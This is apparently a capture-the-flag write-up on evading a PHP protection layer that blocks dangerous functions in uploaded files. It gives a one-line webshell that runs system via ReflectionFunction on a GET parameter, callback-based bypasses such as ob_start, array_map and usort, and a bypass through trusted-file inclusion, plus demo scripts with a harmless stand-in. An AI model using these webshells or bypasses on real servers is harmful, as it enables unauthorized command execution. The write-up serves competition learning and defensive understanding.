Some time ago I was lucky enough to take part in a challenge organised by TSRC. The target environment ran an ordinary Discuz application with an upload interface. The interface allows arbitrary files to be uploaded, but most dangerous PHP functions, such as system, scandir and eval, are blocked. A flag file is placed on the server, and the goal is to locate it through the uploaded PHP file.
Since this was a competition, with generous rewards on top of the ranking, and since under the rules every later submission of the same exploitation method is scored against the first one, getting in first mattered. So as soon as the challenge began I brought out a secret weapon I had treasured for years: PHP reflection. For details, see:
http://cn2.php.net/manual/en/reflectionfunction.invokeargs.php
The simplest form is as follows:
<?php $f = new ReflectionFunction("system"); $f->invokeArgs(array("$_GET[c]")); ?>
The PHP code above is equivalent to system($_GET['c']).
First blood! The first shell uploaded successfully and the flag file was found on the target server without trouble. We scored 5 points.
Once the big move was spent, the remaining days became hard.
My first thought was to try variant after variant, like Sun Wukong running through his 72 transformations, but after several days there was still no progress.
At that point I started to think about how the detection of dangerous-function calls was actually implemented. If the check sits at the function implementation layer, then however the call is disguised it ends up in the same place, and continuing to vary the syntax makes no sense.
Looking back at the earlier use of ReflectionFunction, which did execute the system function, it is clear that there is more than one way to reach the system function.
Besides reflection, the other way PHP provides to call a function indirectly is a callback. Here ob_start is used; for details see: http://www.php.net/manual/en/function.ob-start.php
In its simplest use, system is registered as the output callback with ob_start and the command is echoed into the buffer; when the buffer is flushed, PHP passes the buffered text to the callback, so the effect is again equivalent to calling system on the echoed command.
In this way the dangerous-function check is bypassed a second time and the command executes.
Many other PHP functions accept callbacks, for example:
array_map, array_filter, array_reduce
usort, uksort
array_walk, and so on.
For example, @BlackYe used array_diff_ukey, which also takes a callback.
Several functions related to XML parsing also accept callbacks, but the first argument passed to the callback is the XML parser object, which does not suit this scenario.
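The following script is an added example and is not code from the original article. It collects in one runnable file the indirect-call paths described above (ReflectionFunction::invokeArgs, an ob_start callback, array_map, usort and the array_diff_ukey variant) and then runs a source-text blacklist of the kind the challenge appeared to use over itself. The dangerous function is replaced by a harmless stand-in, pretend_system, which is my own invention so the script can be run safely; setting $target to 'system' reproduces the real bypasses. The command 'id' stands in for the attacker-controlled $_GET['c'].

```php
<?php
// Added example, not code from the original article. The real target in
// the challenge was system; here it is the harmless stand-in below.

$calls = array();   // every invocation of the stand-in is logged here

function pretend_system(string $cmd, $extra = null): string
{
    // Stand-in for the dangerous function: record the command instead of
    // running it. A second parameter is accepted because some callback
    // sites (comparators, output handlers) pass two arguments.
    $GLOBALS['calls'][] = $cmd;
    return 'ran:' . $cmd;
}

$target = 'pretend_system';   // 'system' in the real bypass
$arg    = 'id';               // $_GET['c'] in the real bypass
$hits   = array();

// 1. Reflection: ReflectionFunction::invokeArgs, as in the first shell.
$rf = new ReflectionFunction($target);
$hits['reflection'] = $rf->invokeArgs(array($arg));

// 2. Output-buffer callback: the handler receives the buffered text, so
//    echoing the command and flushing the buffer calls $target($arg).
//    An outer buffer captures the handler's return value for display.
ob_start();
ob_start($target);
echo $arg;
ob_end_flush();
$hits['ob_start'] = ob_get_clean();

// 3. array_map: the callback receives each element.
$hits['array_map'] = array_map($target, array($arg))[0];

// 4. usort: the comparator receives two elements, so the command is
//    placed in the array being sorted; the first argument is logged.
$pair = array($arg, 'x');
usort($pair, $target);
$hits['usort'] = end($calls);

// 5. array_diff_ukey (the variant @BlackYe used): the key comparator is
//    called with a key from each array, so the command goes into a key.
array_diff_ukey(array($arg => 1), array('x' => 1), $target);
$hits['array_diff_ukey'] = end($calls);

// A blacklist over the source text sees none of this: the function name
// only ever appears as a string, never as a direct call expression.
$blacklist = '/\b(system|exec|passthru|shell_exec|eval)\s*\(/';
$direct    = preg_match($blacklist, file_get_contents(__FILE__));

printf("direct blacklisted call in source: %s\n", $direct ? 'yes' : 'no');
foreach ($hits as $path => $result) {
    printf("%-16s -> %s\n", $path, $result);
}
printf("stand-in invoked %d times\n", count($calls));
```

Every path reaches the stand-in although the blacklist regex reports no direct call, which is the whole point of the bypasses. The practitioner's caveat: a restriction on a function name belongs in the engine, not in a scan of the source. PHP's disable_functions setting is enforced on the function table, so a disabled function is blocked on every path, including reflection and callbacks.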
The two different approaches above both end up calling PHP's system function to run system commands. Because the system function is never called directly, the protection system's check is bypassed and the command executes.
Is there a third way to bypass it?
To bypass a check, you have to work out how it is implemented (or how you would implement such a system yourself).
What follows is a series of conjectures, each verified step by step.
1. Some preparation was done first to make things easier to operate and verify. Because the file name differs after every upload, I created, in the fixed upload directory on the server, several PHP scripts containing the functions I would commonly need:
1) copy.php copies and moves files;
2) sql.php performs database operations;
3) read.php reads file contents, mainly to confirm that an uploaded file's content is correct;
4) stat.php reports the owner and read/write permissions of a file or directory;
5) shell.php calls other PHP functions.
2. With these tools ready, I started guessing at the detection principle.
Question 1: Does whether a dangerous function may execute depend on the directory the file is in?
Because the upload directory is fixed, the first thing to establish is whether the directory matters. Using the previously uploaded PHP tools, I found a writable directory under the one in which the web application runs normally and moved the uploaded PHP file there. Result: failure.
Question 2: Is there a whitelist, so that files uploaded later can never execute dangerous PHP functions?
I took over the admin backend and wrote the shell into an existing code file of the web application. The result was still failure.
Question 3: If some functions are disabled, is the application that is already set up affected?
I audited part of the application code, found places that use the disabled PHP functions, and found that they were not affected. In other words, the existing code on the server runs normally as long as it has not been modified; dangerous functions are disabled only for files that are newly uploaded or modified.
Question 4: So what is the difference?
Using the prepared stat.php, I listed the owner and permissions of the uploaded PHP files and of the application's existing PHP files.
Question 5: When a dangerous function is called, does the server check the owner of the PHP file that makes the call?
Method 1:
Suppose the installed web application contains code in which b.php includes a.php. Write the shell into a.php and then request the application's b.php.
The shell code written into a.php is not executed.
This shows that the owner check is applied to the file that directly calls the dangerous function.
Method 2:
Upload a.php through the upload portal. In a.php, call into b.php, where b.php is existing code of the web application that itself calls a dangerous function (such as system).
The Code is as follows:
The execution succeeded, and that was another 5 points.
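The script below is an added example and is not code from the original article. It models the rule inferred in Questions 3 to 5, namely that a dangerous function is allowed only when the file containing the call itself is trusted, and replays Method 1 and Method 2 against that model. The guard function guarded_system, the directory layout and the file names a.php, b.php, lib.php and a2.php are my own assumptions. On the challenge server, trust was presumably keyed on the file owner, as reported by stat.php and PHP's fileowner(); a single-user test box cannot give two files different owners, so the model keys trust on the directory instead, which leaves the caller-file logic, the point of the experiment, unchanged.

```php
<?php
// Added example, not code from the original article. Hypothetical model
// of a file-owner check on dangerous-function calls, with the two probes
// from the text replayed against it.

$base = sys_get_temp_dir() . '/owner-check-' . getmypid();
mkdir($base . '/app', 0700, true);
mkdir($base . '/upload', 0700, true);
$trusted  = realpath($base . '/app');      // stands in for files owned by the app owner
$uploaded = realpath($base . '/upload');   // stands in for files owned by the web server

// What stat.php reported: owner and mode of a file.
function describe(string $file): string
{
    $uid   = fileowner($file);
    $owner = function_exists('posix_getpwuid')
        ? (posix_getpwuid($uid)['name'] ?? (string) $uid)
        : (string) $uid;
    return sprintf('%s owner=%s mode=%o', basename($file), $owner, fileperms($file) & 0777);
}

// The guard the protection layer presumably put in front of system:
// decide on the file that contains the call site (one frame up), not on
// the script that handled the request. The real check would compare
// fileowner($caller) with the application owner's uid; here trust is
// modelled by the directory prefix (assumption).
function guarded_system(string $cmd): string
{
    global $trusted;
    $caller = debug_backtrace(DEBUG_BACKTRACE_IGNORE_ARGS, 1)[0]['file'];
    $ok     = strpos($caller, $trusted . DIRECTORY_SEPARATOR) === 0;
    return ($ok ? 'ALLOWED' : 'DENIED') . " $cmd from " . basename($caller);
}

// Method 1: the application's own b.php includes a.php, and the shell
// (the direct call) was written into a.php, which is not trusted.
file_put_contents("$uploaded/a.php", '<?php return guarded_system("id");');
file_put_contents("$trusted/b.php",
    '<?php return include ' . var_export("$uploaded/a.php", true) . ';');
$method1 = include "$trusted/b.php";

// Method 2: the uploaded a2.php includes existing trusted code that
// itself makes the call, with an argument the uploaded file controls.
file_put_contents("$trusted/lib.php", '<?php return guarded_system($cmd);');
file_put_contents("$uploaded/a2.php",
    '<?php $cmd = "id"; return include ' . var_export("$trusted/lib.php", true) . ';');
$method2 = include "$uploaded/a2.php";

foreach (array("$uploaded/a.php", "$trusted/b.php", "$trusted/lib.php", "$uploaded/a2.php") as $f) {
    echo describe($f), "\n";
}
echo "Method 1: $method1\n";
echo "Method 2: $method2\n";

// Clean up the temporary files.
array_map('unlink', glob("$base/*/*.php"));
rmdir($trusted);
rmdir($uploaded);
rmdir($base);
```

Under this model Method 1 is denied, because the frame that calls guarded_system belongs to the untrusted a.php even though the request went to the trusted b.php, while Method 2 is allowed, because the call site is in the trusted lib.php and only the argument comes from the uploaded file. That asymmetry is exactly what makes a check keyed on the calling file's owner bypassable: any existing, trusted code that passes a caller-controlled value to a dangerous function becomes the third way in.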
This is a summary of my experience bypassing the defence in this challenge. If you have any questions or suggestions, please contact TSRC white hat snowman. I look forward to more chances to take part in this competition in the future.
This article is from http://yangqijun.com; original address: http://yangqijun.com/archives/298. Thanks to the original author for sharing.